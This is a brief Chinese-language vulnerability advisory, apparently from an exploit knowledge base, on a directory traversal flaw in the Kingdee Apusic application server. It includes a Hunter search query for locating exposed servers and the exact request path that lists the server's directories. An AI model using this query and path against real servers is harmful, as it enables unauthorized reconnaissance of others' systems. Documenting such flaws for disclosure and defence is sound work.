金蝶 Apusic应用服务器(中间件) server_file 目录遍历漏洞
一、漏洞简介
金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器,全球第四家获得JavaEE 5.0认证授权的产品,完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化,具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器 server_file处存在目录遍历漏洞,攻击者可以从其中获取网站路径等敏感信息进一步攻击。
二、影响版本
- 金蝶Apusic应用服务器
三、资产测绘
- hunter
app.name="Apusic 金蝶天燕 Server"&&web.title=="Welcome to Apusic Application Server"
- 特征
四、漏洞复现
/admin/protected/selector/server_file/files?folder=/